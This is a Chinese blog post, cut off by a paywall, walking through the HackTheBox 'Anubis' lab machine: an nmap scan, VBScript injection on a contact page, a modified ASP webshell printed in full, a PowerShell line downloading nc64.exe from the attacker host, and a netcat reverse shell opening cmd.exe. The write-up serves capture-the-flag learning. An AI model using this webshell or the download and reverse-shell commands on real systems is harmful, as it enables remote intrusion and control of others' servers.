CTF-Anubis HackTheBox 渗透测试(二)

已于 2022-10-28 09:55:21 修改
阅读量805 收藏 1
点赞数
分类专栏: 红日安全 渗透测试 文章标签: 安全
于 2022-10-19 09:44:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hongrisec/article/details/127401556
版权

大家好,我是你们好朋友小峰。预计从今天开始,陆陆续续为大家推出       CTF-Horizontall HackTheBox 系列文章。

0x01 简介

Anubis是由作者4ndr34z在HackTheBox平台上设计,难度相对较高的靶场。该靶场知识点内容涵盖上传ASP webshell、突破容器、然后在 jamovi 中利用 XSS漏洞获取用户帐户并最终针对 ADCS(Active Directory 证书服务)进行权限升级的利用的真实场景。

靶场知识链条

1.1信息收集

Ønmap

1.2目录枚举

Ø目录/文件枚举

Ø带有 VBScript 注入的联系页面

1.3渗透测试

Ø联系页面上的 ASP Webshell

Ø打破 Windows 容器

Ø跨站脚本漏洞CVE-2021-28079 – Jamovi <= 1.16.18

1.4权限提升

·ADCS 域升级(认证二手研究论文)

·重新配置 Web 模板

·注册管理员以获得证书

·使用 Rubeus 揭示管理员的 NTLM 哈希

·祝贺拿到root用户flag文件

让我们开始

0x02 网络扫描

分配给这台机器的 IP 是 10.129.95.208。Nmap 扫描显示一个网站在端口 443 上运行。首先在我们的 hosts 文件中添加了该网站 SSL 证书中提到的通用名称,用于 DNS 路由。(如图2.1所示)

nmap -sV -sC -Pn 10.129.95.208
echo "10.129.95.208 www.windcorp.htb" >> /etc/hosts

图2.1 nmap端口扫描

0x03 目录枚举

枚举目录后,我们找不到任何有价值的目录页面,除了页面以 *.asp 结尾的文档页面,通过服务搭建猜测后台有一个 Windows 服务器运行。持续利用工具枚举目标网站将我们带到了联系页面,该页面显示可以以文本方式输入任何内容。因此,我尝试在消息正文中输入一个基本的VBScript,vbscript脚本可以把当前访问的cookie名称更改为 Harshit。(如图3.1所示)

图3.1 插入cookie脚本代码

我们发现服务器试图写入一个 cookie时它抛出了一个错误,但这开辟了利用范围。(如图3.2所示)

图3.2 写入脚本代码页面报错

0x04 开发

Kali 自带一个功能非常强大的 ASP webshell,脚本目录位置位于 /usr/share/webshells/asp/cmdasp.asp,我们对其进行了简单修改之后,然后上传到服务器上。您可以直接使用已经修改完成的脚本,如下(如图4.1所示)

<%

Dim oScriptDim oScriptNetDim oFileSys, oFileDim szCMD, szTempFileOn Error Resume NextSet oScript = Server.CreateObject("WSCRIPT.SHELL")Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")szCMD = Request.Form(".CMD")If (szCMD <> "") ThenszTempFile = "C:\" & oFileSys.GetTempName( )Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)End If%>

图4.1 编写恶意webshell脚本文件

通过联系页面插入后,我们看到现在已将其转换为RCE漏洞。现在通过运行一个简单的命令whoami来测试它(如图4.2所示)

图4.2 运行脚本命令语句

由于目标网站为windows服务器,所以我们提前在攻击机上传一个window netcat,然后利用系统python启动一个web服务器,然后利用靶场访问攻击机下载我们上传好nc工具,最终通过失陷主机使用powershell命令下载执行。(如图4.3所示)

python3 -m http.server 80

图4.3 python启动web服务器

在接收端,我们输入以下命令 powershell one-liner 将这个 exe 保存在受害者桌面上(如图4.4所示)

powershell -c iwr http://10.10.16.3/nc64.exe -outf \Users\Administrator\Desktop\nc64.exe

图4.4 利用powershell下载nc可执行文件

最后我们在攻击机上设置端口 1337 为监听器,使用 powershell 启动nc64.exe,你可以看到我们收到了一个反向 shell!(如图4.5所示)(如图4.6所示)

start \Users\Administrator\Desktop\nc64.exe 10.10.16.3 1337 -e cmd.exe

nc -nlvp 1337

最低0.47元/天 解锁文章
hongrisec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
*ctf box题解
Cosmopolitan的博客
04-17 1151
题目给了源码 /* * main.c * Copyright (C) 2019 hzshang <hzshang15@gmail.com> * * Distributed under terms of the MIT license. */ #include <stdio.h> #include <stdlib.h> #include <str...
Powershell下载文件的三种方法
EadderYin的博客
09-30 1万+
Powershell下载文件的三种方法Invork-WebRequestWebClient对象BitsTransfer模块 layout: post title: Powershell下载文件的三种方法 date: 2021-09-29 tags: [“BitsTransfer”,“download”,“powershell”,“powershell”,“计算机技术”] 使用powershell不借助第三方软件下载文件(据我所知)有三种方法:Invork-WebRequest, System.Net.
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5167
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
NewStarCTF2023week4-逃(反序列化字符串逃逸)
Welcome To Myon'Blog !
10-24 859
在反序列化的时候php会根据s所指定的字符长度去读取后边的字符,由于在序列化操作后又使用了str_replace()函数进行字符串替换,这就可能会改变字符串的长度,比如上面将bad替换为good,每替换掉一个bad,字符串长度明显就增加了1,而由于序列化之后s的值没变,但是进行了内容替换,改变了字符串长度,那么反序列化读取时,就并不能将原本的内容读取完全。得到:O:7:"GetFlag":2:{s:3:"key";而后面没有被读到的内容,也就是逃逸出来的字符串,就会被当做当前类的属性被继续执行。
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份PDF文档作者Joas Antonio分享了一些初学者在接触这些平台时可能会发现有用的技巧和策略。 首先,对于...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
Powershell常用命令(下载、反弹、监听)
墨痕诉清风的博客
02-25 1925
【代码】Powershell常用命令(下载、反弹、监听)
使用powershell进行文件下载
qq_33488877的博客
03-05 961
打开powershell的初衷是用.ps1脚本下载论文相关资料,但是完全没听说过这个东西,眼前一黑。 打开powershell 以我浅薄的知识储备,我将其理解为一个类似于cmd或者shell的一个命令行工具, 启动方式1 普通启动 按win+r,输入powershell即可启动。 启动方式2 以管理员身份启动 这种启动方式对于我这种小白来说很有用。 如何在powershell下运行脚本 1.首...
Hack The Box——OpenKeyS
江左盟的博客
08-22 1万+
目录 简介 信息收集 漏洞发现 登录绕过 漏洞利用 权限提升 总结 简介 靶机比较简单,通过目录扫描发现swp文件,分析文件发现auth.php源码和用户名,然后利用CVE-2019-19521绕过登录,接着伪造Cookie获取用户的SSH私钥,利用该文件登录目标主机,最后利用CVE-2019-19520/CVE-2019-19522成功提升至root权限。 信息收集 使用nmap快速扫描目标主机开放的端口和运行的服务,发现开启22和80端口,分别运行OpenSSH 8.1和OpenB
CTF入门web篇17命令执行相关函数及绕过技巧讲解
anquanniu的博客
10-12 2000
命令注入和代码注入区别 之前我们讲过的都是代码注入,注入的代码相当于网页中新的代码,比如去执行数据库读取的操作,我们想办法插入一段代码去执行,这就是代码执行。 命令注入 命令注入执行的是系统中的命令,使目标服务器的命令在目标服务器上去执行我们想要执行的命令,系统命令的执行还是要基于某些函数的调度去实现的。 1、system函数 例如system函数执行系统命令并输出相应的结果: String ...
网络渗透实验四 CTF实践
ROM____的博客
12-14 2863
网络渗透实验四:CTF实践
CTF-安全杂项(十四)
→_→
09-07 801
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 27.女神(来源:实验吧) 1.关卡描述 2.解题步骤 分析: 解压后打开是个txt,目测是base64编码 思路当然就是解码,得到 https://base64.supfree.net/ 然后,复制下来,放到winhex中,新建文本: 这里要选择unicode,这里猜测与解码...
[HTB]HackTheBox-Easy-Secret国外渗透实战靶场
学习记录!大佬速速离开
04-17 4293
🧟无风祭酒🧟 小医救人😈大医济世 ☣️先礼后兵☢️ 👻警👻 📰Majority Papers为笔者学习所整理的内容,本意希望借此知识输出方式达到筑牢基础的效用。如若有不足之处,还望大哥哥海涵。🧱向值得学习的人学习,向前辈们致敬! 🌑🌕暗黑模式,解锁加倍沉浸式阅读快乐🥤 Wechat 公众号:acesec 江湖追杀令 🦾祭出Nmap ┌──(root💀kali)-[/home/kali] └─# nmap -sS -A -sC -sV -p- --min-r...
子域名收集 -- Anubis
weixin_41489908的博客
11-14 384
今天给大家介绍一款子域名收集软件Anubis 下载地址:https://github.com/jonluca/Anubis 一、环境 kali python3 、安装过程: 1、复制到本地安装包 git clone https://github.com/jonluca/Anubis.git 2、进入该目录下 cd Anubis 3、安装以下文件 pip3 install -r requirem...
"CTF网络安全渗透测试Hackthebox和Vulnhub的技巧指南
é um PDF que foi criado com o objetivo de fornecer dicas e truques para iniciantes no mundo do CTF (Capture the Flag) que desejam começar sua jornada nas plataformas Vulnhub e Hackthebox. Embora nã...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值